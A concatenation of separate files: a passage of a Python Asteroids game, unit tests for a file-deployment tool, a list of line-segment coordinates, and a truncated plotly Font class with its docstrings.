def increment_angle_vel(self):
self.angle_vel += .05
def decrement_angle_vel(self):
self.angle_vel -= .05
def shoot(self):
global missile_group
forward = angle_to_vector(self.angle)
missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]
missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]
missile_group.add(Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound))
def get_position(self):
return self.pos
def get_radius(self):
return self.radius
# Sprite class
class Sprite:
def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):
self.pos = [pos[0],pos[1]]
self.vel = [vel[0],vel[1]]
self.angle = ang
self.angle_vel = ang_vel
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
self.lifespan = info.get_lifespan()
self.animated = info.get_animated()
self.age = 0
if sound:
sound.rewind()
sound.play()
def draw(self, canvas):
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
def update(self):
# update angle
self.angle += self.angle_vel
# update position
self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH
self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT
# update age
self.age += 1
if self.age >= self.lifespan:
return True
else:
return False
def collide(self, other_object):
other_position = other_object.get_position()
other_radius = other_object.get_radius()
if dist(self.pos, other_position) <= self.radius + other_radius:
return True
else:
return False
def get_position(self):
return self.pos
def get_radius(self):
return self.radius
# key handlers to control ship
def keydown(key):
if key == simplegui.KEY_MAP['left']:
my_ship.decrement_angle_vel()
elif key == simplegui.KEY_MAP['right']:
my_ship.increment_angle_vel()
elif key == simplegui.KEY_MAP['up']:
my_ship.set_thrust(True)
elif key == simplegui.KEY_MAP['space']:
my_ship.shoot()
def keyup(key):
if key == simplegui.KEY_MAP['left']:
my_ship.increment_angle_vel()
elif key == simplegui.KEY_MAP['right']:
my_ship.decrement_angle_vel()
elif key == simplegui.KEY_MAP['up']:
my_ship.set_thrust(False)
# mouseclick handlers that reset UI and conditions whether splash image is drawn
def click(pos):
global started
center = [WIDTH / 2, HEIGHT / 2]
size = splash_info.get_size()
inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)
inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)
if (not started) and inwidth and inheight:
started = True
def draw(canvas):
global time, started, rock_group, score
# check for rock collisions with ship
ship_collision = group_collide(rock_group, my_ship)
if ship_collision == True:
global lives
lives -= 1
if lives == 0:
started = False
rock_group = set([])
lives = 3
score = 0
# check for missile collisions with rocks
missile_collision = group_group_collide(rock_group, missile_group)
score += missile_collision
# animate background
time += 1
wtime = (time / 4) % WIDTH
center = debris_info.get_center()
size = debris_info.get_size()
canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])
canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))
canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))
# draw UI
canvas.draw_text("Lives", [50, 50], 22, "White")
canvas.draw_text("Score", [680, 50], 22, "White")
canvas.draw_text(str(lives), [50, 80], 22, "White")
canvas.draw_text(str(score), [680, 80], 22, "White")
# draw ship
my_ship.draw(canvas)
# update ship
my_ship.update()
#draw and update sprite groups
process_sprite_group(rock_group, canvas)
process_sprite_group(missile_group, canvas)
# draw splash screen if not started
if not started:
canvas.draw_image(splash_image, splash_info.get_center(),
splash_info.get_size(), [WIDTH / 2, HEIGHT / 2],
splash_info.get_size())
# timer handler that spawns a rock
def rock_spawner():
global rock_group
if started and len(rock_group) <= 8:
rock_pos = [random.randrange(0, WIDTH), random.randrange(0, HEIGHT)]
rock_vel = [random.random() * .6 - .3, random.random() * .6 - .3]
rock_avel = random.random() * .2 - .1
a_rock = Sprite(rock_pos, rock_vel, 0, rock_avel, asteroid_image, asteroid_info)
if dist(rock_pos, my_ship.get_position()) > my_ship.get_radius():
rock_group.add(a_rock)
# helper function to update/draw a group of sprites
def process_sprite_group(a_set, a_canvas):
removed_sprites = set([])
for sprite in a_set:
sprite.draw(a_canvas)
aged_out = sprite.update()
if aged_out == True:
removed_sprites.add(sprite)
a_set.difference_update(removed_sprites)
# helper function to determine whether any items in a set
# have collided with another object
def group_collide(group, other_object):
remove_group = set([])
for item in group:
if item.collide(other_object):
remove_group.add(item)
if len(remove_group) > 0:
group.difference_update(remove_group)
return True
else:
return False
# helper function for detecting missile/rock collisions
def group_group_collide(group1, group2):
deleted_items = set([])
total = 0
for item in group1:
if group_collide(group2, item):
deleted_items.add(item)
total += 1
group1.difference_update(deleted_items)
return total
# initialize stuff
frame = simplegui.create_frame("Asteroids", WIDTH, HEIGHT)
# initialize ship and two sprites
my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)
rock_group = set([])
missile_group = set([])
# register handlers
frame.set_keyup_handler(keyup)
frame.set_keydown_handler(keydown)
frame.set_mouseclick_handler(click)
frame.set_draw_handler(draw)
timer = simplegui.create_timer(1000.0, rock_spawner)
# get things rolling
timer.start()
frame.start()
|
|
#!/usr/bin/env python3
import io
import json
import logging
import os
import sys
import tarfile
import tempfile
import unittest
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from src import Application, Logger, load
def _get_json(obj):
return json.dumps(obj).encode('utf-8')
class ApplicationTester(unittest.TestCase):
def setUp(self):
self.directory = tempfile.TemporaryDirectory()
def tearDown(self):
self.directory.cleanup()
def assert_file(self, name, expect_exists=None, expect_chmod=None):
path = os.path.join(self.directory.name, name)
if expect_exists is not None:
self.assertTrue(os.path.exists(path))
with open(path, 'rb') as file:
data = file.read()
self.assertEqual(data, expect_exists)
if expect_chmod is not None:
stat = os.stat(path)
self.assertEqual(stat.st_mode & 0o777, expect_chmod)
else:
self.assertFalse(os.path.exists(path))
def create_directory(self, name):
path = os.path.join(self.directory.name, name)
os.makedirs(path, exist_ok=True)
return path
def create_file(self, name, data):
path = os.path.join(self.directory.name, name)
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, 'wb') as file:
file.write(data)
return path
def delete_file(self, name):
path = os.path.join(self.directory.name, name)
if os.path.exists(path):
os.remove(path)
def deploy(self, config, location_names):
logger = Logger.build(logging.WARNING, False)
application = Application(logger, True)
definition = load(logger, self.directory.name, config)
self.assertFalse(definition is None)
self.assertTrue(application.run(definition, location_names, [], [], None, None))
def test_deploy_from_archive(self):
archive = self.create_file('archive.tar', b'')
data = b'Some binary contents'
with tarfile.open(archive, 'w') as tar:
info = tarfile.TarInfo('item.bin')
info.size = len(data)
tar.addfile(info, io.BytesIO(initial_bytes=data))
target = self.create_directory('target')
self.create_file('.creep.def', _get_json({"origin": "archive.tar"}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/item.bin', data)
def test_deploy_from_archive_with_subdir(self):
archive = self.create_file('archive.tar', b'')
data = b'Some binary contents'
with tarfile.open(archive, 'w') as tar:
info = tarfile.TarInfo('remove/keep/item.bin')
info.size = len(data)
tar.addfile(info, io.BytesIO(initial_bytes=data))
target = self.create_directory('target')
self.create_file('.creep.def', _get_json({"origin": "archive.tar#remove"}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/keep/item.bin', data)
def test_deploy_from_directory_then_append(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create first file and deploy
self.create_file('source/a/a', b'a')
self.deploy('source', ['default'])
self.assert_file('target/a/a', b'a')
# Create second file and deploy
self.create_file('source/b/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b', b'b')
def test_deploy_from_directory_then_delete(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create files and deploy
self.create_file('source/a/a', b'a')
self.create_file('source/b/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b', b'b')
# Delete one file and deploy
self.delete_file('source/b/b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
self.assert_file('target/b/b')
def test_deploy_from_directory_then_replace(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
# Create file and deploy
self.create_file('source/a/a', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'a')
# Replace file and deploy again
self.create_file('source/a/a', b'aaa')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/a/a', b'aaa')
def test_deploy_from_directory_with_one_file(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/test', b'Hello, World!')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/test', b'Hello, World!')
def test_deploy_from_directory_with_tree(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.create_file('source/b/bb', b'b')
self.create_file('source/c/c/c', b'c')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
self.assert_file('target/b/bb', b'b')
self.assert_file('target/c/c/c', b'c')
def test_deploy_from_url(self):
target = self.create_directory('target')
self.create_file(
'.creep.def',
_get_json({
"origin":
"https://gist.github.com/r3c/2004ebb0763a02b5945287f3dfa2e3e2/archive/003650e2639b49edc8c4ff6eb20e0931edb547dc.zip#2004ebb0763a02b5945287f3dfa2e3e2-003650e2639b49edc8c4ff6eb20e0931edb547dc"
}))
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///" + target}}))
self.deploy('.', ['default'])
self.assert_file('target/filename', b'test')
def test_deploy_using_definition_default(self):
self.create_directory('target')
self.create_file('source/.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
def test_deploy_using_definition_inline(self):
self.create_directory('target')
self.create_file('.creep.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy({"origin": "source"}, ['default'])
self.assert_file('target/aaa', b'a')
def test_deploy_using_definition_path_with_cascade_inline(self):
self.create_directory('target1')
self.create_directory('target2')
self.create_file(
'source1/.creep.def',
_get_json({
"cascades": [{
"environment": {
"default": {
"connection": "file:///../target2"
}
},
"modifiers": [{
"pattern": "^c$",
"filter": ""
}],
"origin": "../source2"
}],
"environment": {
"default": {
"connection": "file:///../target1"
}
}
}))
self.create_file('source1/a', b'a')
self.create_file('source2/b', b'b')
self.create_file('source2/c', b'c')
self.deploy('source1', ['default'])
self.assert_file('target1/a', b'a')
self.assert_file('target2/b', b'b')
self.assert_file('target2/c', None)
def test_deploy_using_definition_path_with_cascade_path(self):
self.create_directory('target1')
self.create_directory('target2')
self.create_file(
'source1/.creep.def',
_get_json({
"cascades": ["../source2_def"],
"environment": {
"default": {
"connection": "file:///../target1"
}
}
}))
self.create_file(
'source2_def',
_get_json({
"environment": "source2_env",
"modifiers": [{
"pattern": "^c$",
"filter": ""
}],
"origin": "source2"
}))
self.create_file('source2_env', _get_json({"default": {"connection": "file:///../target2"}}))
self.create_file('source1/a', b'a')
self.create_file('source2/b', b'b')
self.create_file('source2/c', b'c')
self.deploy('source1', ['default'])
self.assert_file('target1/a', b'a')
self.assert_file('target2/b', b'b')
self.assert_file('target2/c', None)
def test_deploy_using_definition_path_with_cascade_tree(self):
self.create_directory('target')
self.create_file('source/.creep.def', _get_json({"cascades": ["a"], "environment": {"default": {}}}))
self.create_file('source/a/.creep.def', _get_json({"cascades": ["b"], "environment": {"default": {}}}))
self.create_file('source/a/b/.creep.env', _get_json({"default": {"connection": "file:///../../../target"}}))
self.create_file('source/a/b/c', b'c')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/a/.creep.def', None)
self.assert_file('target/a/b/.creep.env', None)
self.assert_file('target/c', b'c')
def test_deploy_using_definition_path_with_modifier_chmod(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^.$",
"chmod": "751"
}]
}))
self.create_file('target/.creep.rev', _get_json({"default": {"a": "dummy", "b": "dummy"}}))
self.create_file('source/a', b'a')
self.create_file('target/b', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/a', b'a', 0o751)
self.assert_file('target/b')
def test_deploy_using_definition_path_with_modifier_filter_false(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^bbb$",
"filter": ""
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', b'a')
self.assert_file('target/bbb')
def test_deploy_using_definition_path_with_modifier_filter_grep(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^...$",
"filter": "grep -q b '{}'"
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', None)
self.assert_file('target/bbb', b'b')
def test_deploy_using_definition_path_with_modifier_link(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^list$",
"filter": "",
"link": "cat '{}'"
}]
}))
self.create_file('source/list', b'x\ny\n')
self.create_file('source/x', b'x')
self.create_file('source/y', b'y')
self.deploy('source', ['default'])
# FIXME: x and y would have been transfered anyway ; fix test so they're ignored by default
self.assert_file('target/.creep.def', None)
self.assert_file('target/x', b'x')
self.assert_file('target/y', b'y')
def test_deploy_using_definition_path_with_modifier_modify(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^...$",
"modify": "sed -r 's/a/b/g' '{}'"
}]
}))
self.create_file('source/aaa', b'aaa')
self.create_file('source/bbb', b'bbb')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/aaa', b'bbb')
self.assert_file('target/bbb', b'bbb')
def test_deploy_using_definition_path_with_modifier_rename(self):
self.create_directory('target')
self.create_file(
'source/.creep.def',
_get_json({
"environment": {
"default": {
"connection": "file:///../target"
}
},
"modifiers": [{
"pattern": "^(...)$",
"rename": "r_\\1"
}]
}))
self.create_file('source/aaa', b'a')
self.create_file('source/bbb', b'b')
self.deploy('source', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/r_aaa', b'a')
self.assert_file('target/r_bbb', b'b')
def test_deploy_using_environment_inline(self):
self.create_directory('target')
self.create_file('source/.creep.def',
_get_json({"environment": {
"default": {
"connection": "file:///../target"
}
}}))
self.create_file('source/aaa', b'a')
self.deploy('source', ['default'])
self.assert_file('target/.creep.env', None)
self.assert_file('target/aaa', b'a')
def test_deploy_using_environment_path(self):
self.create_directory('target')
self.create_file('source/.creep.def', _get_json({"environment": ".test.env"}))
self.create_file('source/.test.env', _get_json({"default": {"connection": "file:///../target"}}))
self.create_file('source/aaa', b'a')
self.deploy('source/.creep.def', ['default'])
self.assert_file('target/.creep.def', None)
self.assert_file('target/.test.env', None)
self.assert_file('target/aaa', b'a')
if __name__ == '__main__':
unittest.main()
|
|
62,963 -> 844,181
58,85 -> 917,944
137,76 -> 137,347
453,125 -> 347,19
178,65 -> 977,864
447,360 -> 62,745
723,326 -> 156,893
47,497 -> 107,437
387,491 -> 340,491
58,477 -> 283,252
86,351 -> 562,827
215,172 -> 539,172
496,801 -> 496,63
546,412 -> 232,98
621,807 -> 481,807
471,20 -> 618,20
175,283 -> 175,467
19,283 -> 19,290
159,137 -> 159,11
593,181 -> 543,181
167,976 -> 929,976
730,782 -> 959,782
713,285 -> 713,880
583,144 -> 583,296
39,61 -> 961,983
778,81 -> 604,81
70,560 -> 70,889
85,129 -> 666,710
689,688 -> 632,688
76,52 -> 903,879
510,543 -> 22,55
510,935 -> 470,935
780,357 -> 780,602
440,349 -> 710,79
934,801 -> 412,801
979,25 -> 35,969
379,527 -> 379,76
243,524 -> 243,664
534,945 -> 11,422
198,367 -> 224,367
871,451 -> 456,451
226,231 -> 939,231
686,354 -> 740,300
543,68 -> 340,68
506,160 -> 319,347
177,25 -> 177,603
337,450 -> 724,450
421,519 -> 676,519
858,976 -> 179,297
236,222 -> 236,250
254,242 -> 254,626
859,243 -> 23,243
89,982 -> 979,92
58,758 -> 101,801
930,483 -> 587,826
667,717 -> 667,762
512,816 -> 845,816
17,501 -> 17,760
345,61 -> 847,61
531,840 -> 618,840
67,748 -> 262,748
548,461 -> 163,846
934,142 -> 169,907
119,931 -> 580,470
769,916 -> 457,604
587,458 -> 93,458
109,850 -> 768,191
225,129 -> 160,64
544,163 -> 544,476
304,594 -> 61,351
510,396 -> 510,741
772,210 -> 772,889
867,415 -> 721,269
466,266 -> 466,44
305,609 -> 305,237
563,962 -> 451,962
566,402 -> 28,940
889,717 -> 891,717
754,545 -> 313,545
930,976 -> 209,255
70,911 -> 692,289
737,37 -> 958,37
652,566 -> 720,634
776,551 -> 370,957
484,476 -> 820,476
119,420 -> 639,420
394,964 -> 394,221
340,767 -> 964,143
715,289 -> 481,55
236,389 -> 826,389
747,642 -> 33,642
583,351 -> 244,690
609,17 -> 609,680
460,365 -> 668,365
519,180 -> 929,590
206,45 -> 782,45
507,185 -> 386,306
16,12 -> 982,978
31,348 -> 320,348
54,975 -> 947,82
844,714 -> 870,714
677,965 -> 677,699
387,699 -> 387,26
329,479 -> 189,479
970,708 -> 538,708
565,434 -> 565,623
748,737 -> 748,497
255,984 -> 255,600
146,59 -> 932,845
191,929 -> 423,929
316,409 -> 802,409
208,560 -> 559,209
885,237 -> 135,987
477,486 -> 260,486
845,59 -> 845,811
225,369 -> 162,369
858,678 -> 858,362
162,972 -> 27,972
828,26 -> 283,571
670,48 -> 114,604
732,487 -> 620,487
570,575 -> 14,19
113,203 -> 162,154
374,702 -> 374,452
850,575 -> 535,575
841,133 -> 841,474
976,960 -> 642,960
177,428 -> 177,246
969,289 -> 589,289
787,842 -> 731,786
743,709 -> 336,709
15,914 -> 299,630
863,952 -> 17,952
586,889 -> 586,512
442,128 -> 436,128
633,367 -> 79,921
21,990 -> 257,990
829,297 -> 829,103
975,633 -> 879,633
946,887 -> 72,13
531,720 -> 123,312
84,954 -> 815,223
989,982 -> 257,982
669,417 -> 928,158
128,935 -> 87,976
692,850 -> 191,850
686,856 -> 686,259
135,396 -> 473,58
837,206 -> 629,206
751,227 -> 751,900
190,617 -> 190,502
850,265 -> 254,265
229,587 -> 325,491
980,747 -> 465,232
54,375 -> 439,375
737,844 -> 711,844
533,219 -> 123,629
232,805 -> 232,798
911,441 -> 911,160
80,294 -> 80,527
880,533 -> 590,533
674,84 -> 674,670
956,440 -> 554,842
24,939 -> 890,73
516,183 -> 145,554
71,584 -> 71,766
629,173 -> 643,187
34,360 -> 639,965
983,871 -> 983,682
986,590 -> 986,327
769,986 -> 130,986
392,192 -> 70,192
577,379 -> 635,379
243,664 -> 162,664
273,987 -> 273,192
251,548 -> 558,855
989,736 -> 989,611
400,697 -> 134,431
646,923 -> 646,841
768,782 -> 386,782
93,973 -> 939,127
489,91 -> 489,551
313,683 -> 248,748
986,61 -> 201,846
322,413 -> 737,413
567,716 -> 567,614
198,624 -> 439,624
402,198 -> 147,453
897,352 -> 897,298
773,379 -> 773,19
373,256 -> 931,814
690,796 -> 543,796
884,368 -> 464,368
136,864 -> 622,378
458,569 -> 458,254
491,462 -> 491,412
558,340 -> 73,340
980,52 -> 980,605
126,609 -> 390,345
437,659 -> 17,659
53,928 -> 982,928
389,591 -> 389,832
464,46 -> 464,754
646,680 -> 646,988
919,159 -> 109,969
334,75 -> 219,75
976,639 -> 976,685
264,773 -> 128,773
787,771 -> 699,771
415,124 -> 549,124
468,71 -> 468,701
815,121 -> 797,121
619,95 -> 610,104
886,294 -> 120,294
148,136 -> 148,314
816,971 -> 454,971
888,733 -> 431,733
59,836 -> 840,55
52,965 -> 962,55
989,982 -> 19,12
697,818 -> 185,306
883,638 -> 481,638
429,285 -> 170,26
516,507 -> 516,301
767,102 -> 61,808
764,793 -> 209,238
568,411 -> 261,718
706,622 -> 685,622
226,110 -> 790,674
544,429 -> 544,334
794,588 -> 794,792
804,738 -> 782,738
370,552 -> 370,189
960,275 -> 644,275
133,896 -> 686,896
12,986 -> 987,11
978,973 -> 69,64
92,465 -> 62,465
733,57 -> 18,57
110,845 -> 110,272
123,935 -> 123,499
37,960 -> 986,11
332,209 -> 344,221
237,279 -> 349,279
875,635 -> 875,420
552,174 -> 552,635
10,93 -> 853,936
909,82 -> 909,926
511,743 -> 511,830
223,974 -> 223,124
829,543 -> 11,543
307,671 -> 206,570
126,72 -> 956,72
528,903 -> 528,223
644,524 -> 952,216
734,324 -> 734,105
225,558 -> 225,159
667,122 -> 667,64
582,93 -> 582,509
817,932 -> 727,932
898,18 -> 79,837
12,987 -> 986,13
426,79 -> 722,79
496,884 -> 906,884
953,183 -> 953,508
360,881 -> 975,881
765,862 -> 579,862
14,55 -> 14,560
454,333 -> 290,333
19,479 -> 91,551
696,41 -> 56,41
329,203 -> 812,203
498,559 -> 498,636
822,852 -> 614,852
410,370 -> 410,624
829,415 -> 805,415
775,980 -> 204,980
705,780 -> 116,191
49,30 -> 988,969
324,199 -> 554,199
727,572 -> 157,572
212,693 -> 93,693
886,105 -> 152,105
239,834 -> 958,115
623,920 -> 623,523
389,225 -> 106,508
443,426 -> 443,108
129,770 -> 858,41
906,559 -> 392,559
44,793 -> 774,793
693,275 -> 693,738
623,434 -> 184,873
774,623 -> 774,895
140,187 -> 140,238
247,503 -> 45,301
575,365 -> 950,365
101,120 -> 646,120
42,682 -> 649,75
749,767 -> 516,534
551,53 -> 73,531
15,26 -> 885,896
749,15 -> 235,529
548,169 -> 784,405
458,564 -> 962,564
663,873 -> 678,873
349,773 -> 349,927
777,180 -> 637,320
238,306 -> 844,912
927,818 -> 652,543
404,673 -> 952,125
750,297 -> 18,297
926,958 -> 926,669
767,843 -> 767,833
151,136 -> 234,219
927,789 -> 468,330
593,361 -> 593,447
48,14 -> 954,920
282,972 -> 790,972
537,446 -> 202,446
847,125 -> 357,615
667,609 -> 299,609
820,987 -> 359,987
342,889 -> 595,889
692,414 -> 239,414
916,935 -> 70,89
289,884 -> 289,790
264,562 -> 373,562
850,24 -> 126,748
877,159 -> 213,823
702,607 -> 702,454
432,883 -> 432,260
530,387 -> 229,387
783,39 -> 783,933
757,775 -> 757,81
416,376 -> 474,376
220,462 -> 220,824
438,317 -> 421,317
403,312 -> 866,312
902,923 -> 204,923
345,33 -> 819,33
376,521 -> 549,521
172,320 -> 129,277
25,975 -> 976,24
730,108 -> 465,373
607,468 -> 737,598
376,55 -> 672,55
807,113 -> 974,113
345,804 -> 695,454
687,921 -> 650,884
262,743 -> 262,753
889,734 -> 499,344
424,727 -> 909,242
100,957 -> 100,832
558,958 -> 376,958
422,473 -> 539,356
424,463 -> 158,463
329,543 -> 816,543
300,74 -> 362,136
620,691 -> 620,312
215,727 -> 360,582
692,116 -> 618,116
945,722 -> 945,560
851,83 -> 450,484
692,424 -> 254,862
160,214 -> 160,405
937,101 -> 854,184
989,14 -> 18,985
256,275 -> 828,847
797,748 -> 509,748
521,148 -> 422,148
85,549 -> 85,807
689,688 -> 443,442
750,664 -> 648,562
51,616 -> 51,54
925,272 -> 925,696
284,560 -> 369,560
509,685 -> 509,559
985,157 -> 273,869
570,765 -> 614,721
62,981 -> 985,58
289,496 -> 289,104
752,232 -> 692,292
82,948 -> 683,948
15,20 -> 984,989
252,950 -> 252,132
930,659 -> 614,659
552,449 -> 798,695
850,894 -> 342,386
412,465 -> 412,383
249,616 -> 351,718
759,289 -> 613,289
673,347 -> 673,842
749,493 -> 449,493
378,468 -> 378,674
914,924 -> 890,900
514,56 -> 606,56
855,233 -> 979,233
170,756 -> 170,961
450,601 -> 450,87
868,192 -> 125,935
702,137 -> 231,608
109,36 -> 632,36
511,472 -> 511,945
208,884 -> 923,169
831,66 -> 146,66
435,133 -> 884,133
900,418 -> 916,418
957,104 -> 127,104
608,892 -> 608,40
554,782 -> 55,782
305,260 -> 305,712
942,143 -> 226,859
823,778 -> 317,778
228,415 -> 228,445
313,505 -> 669,505
43,539 -> 43,187
14,84 -> 743,813
687,101 -> 277,101
549,977 -> 549,392
21,637 -> 214,637
950,961 -> 104,115
778,831 -> 958,831
214,765 -> 579,765
586,42 -> 89,42
505,950 -> 505,115
144,734 -> 144,813
11,349 -> 11,681
49,336 -> 99,386
560,187 -> 560,551
678,602 -> 761,519
131,515 -> 411,795
957,835 -> 957,106
948,852 -> 948,990
541,946 -> 541,405
355,147 -> 724,516
644,476 -> 625,476
789,818 -> 207,236
259,57 -> 431,57
441,375 -> 441,34
774,121 -> 882,13
655,397 -> 188,864
467,432 -> 235,200
268,121 -> 268,842
975,14 -> 11,978
124,904 -> 935,93
401,582 -> 420,582
170,700 -> 523,347
20,681 -> 20,174
420,939 -> 173,692
61,933 -> 956,38
686,458 -> 686,939
780,561 -> 305,86
792,644 -> 792,780
632,550 -> 938,550
441,252 -> 841,252
789,59 -> 789,418
981,11 -> 278,714
264,41 -> 264,186
870,833 -> 605,568
160,905 -> 160,783
385,191 -> 385,403
774,791 -> 69,86
409,967 -> 409,173
868,41 -> 868,235
536,497 -> 949,497
757,119 -> 156,720
563,706 -> 883,706
124,482 -> 14,482
353,655 -> 904,104
194,868 -> 194,649
810,736 -> 748,736
815,578 -> 50,578
531,131 -> 241,131
18,972 -> 977,13
761,747 -> 73,59
650,701 -> 930,701
470,237 -> 470,740
333,803 -> 954,182
644,667 -> 235,667
943,766 -> 299,766
985,876 -> 985,503
170,924 -> 467,924
249,19 -> 981,751
462,666 -> 462,651
404,228 -> 877,228
174,440 -> 174,847
910,596 -> 672,596
430,663 -> 734,663
711,294 -> 69,294
193,302 -> 257,302
959,20 -> 13,966
171,561 -> 171,953
704,986 -> 29,311
285,886 -> 285,260
945,872 -> 531,458
265,748 -> 478,748
26,537 -> 26,851
205,210 -> 917,922
590,488 -> 241,139
536,179 -> 247,179
|
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Font(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "box.hoverlabel"
_path_str = "box.hoverlabel.font"
_valid_props = {"color", "colorsrc", "family", "familysrc", "size", "sizesrc"}
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `color`.
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
